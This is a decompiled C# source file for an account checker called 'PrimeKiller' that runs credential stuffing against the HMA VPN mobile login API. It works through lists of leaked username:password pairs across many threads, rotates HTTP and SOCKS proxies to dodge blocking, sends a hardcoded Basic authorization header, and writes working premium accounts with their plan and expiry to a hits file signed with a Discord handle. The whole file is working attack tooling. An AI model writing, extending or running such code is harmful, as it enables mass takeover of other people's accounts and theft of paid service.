using System;
using System.Collections.Concurrent;
using System.Collections.Generic;
using System.IO;
using System.Net;
using System.Threading;
using System.Threading.Tasks;
using Leaf.xNet;

namespace PrimeKiller
{
	// Token: 0x02000005 RID: 5
	internal class HmaChecker
	{
		// Token: 0x06000019 RID: 25 RVA: 0x00002F64 File Offset: 0x00002F64
		public HmaChecker(ConcurrentQueue&lt;string&gt; combos, List&lt;string&gt; proxies, string prot)
		{
			this.coqueue = combos;
			this.proqueue = proxies;
			this.len = this.coqueue.Count;
			this.protocol = prot;
			this.currentdirectory = Directory.GetCurrentDirectory();
			this.folder = this.currentdirectory + &quot;\\Hits HMA\\&quot; + DateTime.Now.ToString(&quot;dd-MM-yyyy H.mm&quot;);
		}

		// Token: 0x0600001A RID: 26 RVA: 0x00002FFC File Offset: 0x00002FFC
		public void Create()
		{
			if (!Directory.Exists(&quot;Hits HMA&quot;))
			{
				Directory.CreateDirectory(&quot;Hits HMA&quot;);
			}
			if (!Directory.Exists(this.folder))
			{
				Directory.CreateDirectory(this.folder);
			}
		}

		// Token: 0x0600001B RID: 27 RVA: 0x00003030 File Offset: 0x00003030
		private void Login()
		{
			if (this.protocol == &quot;HTTP&quot; || this.protocol == &quot;SOCKS4&quot; || this.protocol == &quot;SOCKS5&quot;)
			{
				HttpRequest httpRequest = new HttpRequest
				{
					UserAgent = &quot;Dalvik/2.1.0 (Linux; U; Android 7.0; SM-G950F Build/NRD90M)&quot;,
					KeepAliveTimeout = 5000,
					ConnectTimeout = 5000,
					ReadWriteTimeout = 5000,
					IgnoreProtocolErrors = true,
					AllowAutoRedirect = false,
					Proxy = null,
					UseCookies = true
				};
				httpRequest.KeepAlive = true;
				httpRequest.AddHeader(&quot;Authorization&quot;, &quot;Basic bW9iaXNvbDExMTE6a1pERVk2enMzZA==&quot;);
				while (this.coqueue.Count &gt; 0)
				{
					string text;
					this.coqueue.TryDequeue(out text);
					httpRequest.Cookies = null;
					string[] array = text.Split(new char[]
					{
						&#039;:&#039;
					});
					if (httpRequest.Proxy == null)
					{
						httpRequest.Proxy = ((!(this.protocol == &quot;HTTP&quot;)) ? ((!(this.protocol == &quot;SOCKS4&quot;)) ? Socks5ProxyClient.Parse(this.proqueue[this.rnd.Next(this.proqueue.Count)]) : Socks4ProxyClient.Parse(this.proqueue[this.rnd.Next(this.proqueue.Count)])) : HttpProxyClient.Parse(this.proqueue[this.rnd.Next(this.proqueue.Count)]));
					}
					try
					{
						string str = &quot;username=&quot; + array[0] + &quot;&amp;password=&quot; + array[1];
						string text2 = httpRequest.Post(&quot;https://mobile.api.hmageo.com/clapi/v1.5/user/login&quot;, str, &quot;application/x-www-form-urlencoded&quot;).ToString();
						if (text2.Contains(&quot;Invalid username/password combination&quot;) || text2.Contains(&quot;\&quot;plan\&quot;:\&quot;Free Trial\&quot;&quot;) || text2.Contains(&quot;plan\&quot;:\&quot;\&quot;&quot;))
						{
							this.invalids++;
							Globals.LastChecks++;
						}
						else if (text2.Contains(&quot;{\&quot;status\&quot;:0,\&quot;data\&quot;:{\&quot;user\&quot;:\&quot;&quot;))
						{
							string text3 = this.Parse(text2, &quot;\&quot;plan\&quot;:\&quot;&quot;, &quot;\&quot;&quot;);
							string text4 = this.Parse(text2, &quot;\&quot;expires\&quot;:\&quot;&quot;, &quot;\&quot;&quot;);
							Console.ForegroundColor = ConsoleColor.Green;
							Console.WriteLine(string.Concat(new string[]
							{
								&quot; [+] &quot;,
								array[0],
								&quot;:&quot;,
								array[1],
								&quot; | &quot;,
								text3,
								&quot; , &quot;,
								text4
							}));
							this.hits++;
							Globals.LastChecks++;
							this.Save(array[0], array[1], text3, text4);
						}
						else
						{
							this.retries++;
							this.coqueue.Enqueue(text);
							httpRequest.Proxy = null;
						}
					}
					catch
					{
						this.retries++;
						this.coqueue.Enqueue(text);
						httpRequest.Proxy = null;
					}
				}
				httpRequest.Dispose();
			}
		}

		// Token: 0x0600001C RID: 28 RVA: 0x00003358 File Offset: 0x00003358
		public void Start()
		{
			Task.Factory.StartNew(delegate()
			{
				while (Globals.Working)
				{
					HmaChecker.Cps.TryAdd(DateTimeOffset.Now.ToUnixTimeSeconds(), (long)Globals.LastChecks);
					Globals.LastChecks = 0;
					Thread.Sleep(1000);
				}
			});
		}

		// Token: 0x0600001D RID: 29 RVA: 0x00003384 File Offset: 0x00003384
		public void Threading(int amount)
		{
			ServicePointManager.DefaultConnectionLimit = amount * 2;
			ServicePointManager.Expect100Continue = false;
			List&lt;Thread&gt; list = new List&lt;Thread&gt;();
			list.Add(new Thread(new ThreadStart(this.Info)));
			for (int i = 0; i &lt;= amount; i++)
			{
				Thread item = new Thread(new ThreadStart(this.Login));
				list.Add(item);
			}
			foreach (Thread thread in list)
			{
				thread.Start();
			}
		}

		// Token: 0x0600001E RID: 30 RVA: 0x00003420 File Offset: 0x00003420
		private void Info()
		{
			for (;;)
			{
				this.checkd = this.hits + this.invalids;
				Console.Title = string.Format(&quot;HMA | Checked {0}/{1} | Hits {2} - Invalids {3} - Retries {4} - Cpm {5} &quot;, new object[]
				{
					this.checkd,
					this.len,
					this.hits,
					this.invalids,
					this.retries,
					this.GetCpm()
				});
				Thread.Sleep(1000);
			}
		}

		// Token: 0x0600001F RID: 31 RVA: 0x000034B8 File Offset: 0x000034B8
		private long GetCpm()
		{
			long num = 0L;
			foreach (KeyValuePair&lt;long, long&gt; keyValuePair in HmaChecker.Cps)
			{
				if (keyValuePair.Key &gt;= DateTimeOffset.Now.ToUnixTimeSeconds() - 60L)
				{
					num += keyValuePair.Value;
				}
			}
			return num;
		}

		// Token: 0x06000020 RID: 32 RVA: 0x00003528 File Offset: 0x00003528
		private string Parse(string source, string left, string right)
		{
			return source.Split(new string[]
			{
				left
			}, StringSplitOptions.None)[1].Split(new string[]
			{
				right
			}, StringSplitOptions.None)[0];
		}

		// Token: 0x06000021 RID: 33 RVA: 0x00003550 File Offset: 0x00003550
		private void Save(string user, string passw, string plan, string expire)
		{
			object value = string.Concat(new string[]
			{
				user,
				&quot;:&quot;,
				passw,
				&quot; | &quot;,
				plan,
				&quot; , &quot;,
				expire,
				&quot;| PrimeKiller Checker Discord: PrimeKiller#3629&quot;
			});
			string path = this.folder + &quot;\\Premium.txt&quot;;
			try
			{
				if (!File.Exists(path))
				{
					File.Create(path).Close();
				}
			}
			catch (Exception value2)
			{
				Console.WriteLine(value2);
			}
			try
			{
				object writeLock = HmaChecker.WriteLock;
				lock (writeLock)
				{
					using (FileStream fileStream = File.Open(path, FileMode.Append))
					{
						using (StreamWriter streamWriter = new StreamWriter(fileStream))
						{
							streamWriter.WriteLine(value);
						}
					}
				}
			}
			catch (Exception value3)
			{
				Console.WriteLine(value3);
			}
		}

		// Token: 0x0400001C RID: 28
		private static readonly ConcurrentDictionary&lt;long, long&gt; Cps = new ConcurrentDictionary&lt;long, long&gt;();

		// Token: 0x0400001D RID: 29
		private static readonly object WriteLock = new object();

		// Token: 0x0400001E RID: 30
		private Random rnd = new Random();

		// Token: 0x0400001F RID: 31
		private ConcurrentQueue&lt;string&gt; coqueue = new ConcurrentQueue&lt;string&gt;();

		// Token: 0x04000020 RID: 32
		private List&lt;string&gt; proqueue = new List&lt;string&gt;();

		// Token: 0x04000021 RID: 33
		private string currentdirectory = Directory.GetCurrentDirectory();

		// Token: 0x04000022 RID: 34
		private int hits;

		// Token: 0x04000023 RID: 35
		private int invalids;

		// Token: 0x04000024 RID: 36
		private int retries;

		// Token: 0x04000025 RID: 37
		private int len;

		// Token: 0x04000026 RID: 38
		private int checkd;

		// Token: 0x04000027 RID: 39
		private string protocol;

		// Token: 0x04000028 RID: 40
		private string folder;
	}
}